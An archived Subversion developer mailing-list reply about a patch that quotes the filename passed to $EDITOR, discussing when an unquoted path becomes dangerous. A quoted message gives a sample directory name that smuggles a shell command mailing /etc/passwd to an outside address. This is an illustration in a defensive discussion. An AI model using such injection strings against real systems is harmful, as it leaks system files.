Re: [PATCH] Quote filename passed to $EDITOR

From: Karl Fogel <kfogel_at_newton.ch.collab.net>
Date: 2002-07-23 22:23:18 CEST

Scott Lamb <slamb@slamb.org> writes:
> I don't think that's likely because they would have to run the checkin
> from that directory. Hard not to notice a directory called "$(mail
> to-me@test.com < /etc/passwd; echo null)" if you just 'cd'd to it.

Indeed, if you've cd'd to it, you won't have this problem. It's only
if you run the command from some other (usually higher) directory,
passing the dangerous pathname as an argument.

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@subversion.tigris.org
For additional commands, e-mail: dev-help@subversion.tigris.org
Received on Tue Jul 23 22:36:35 2002

This message: [ Message body ]
Next message: Daniele Nicolodi: "Re: problems building documentation"
Previous message: Karl Fogel: "Re: HTTP authentication vs. --username and --password"
In reply to: Scott Lamb: "Re: [PATCH] Quote filename passed to $EDITOR"
Next in thread: Marcus Comstedt: "Re: [PATCH] Quote filename passed to $EDITOR"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]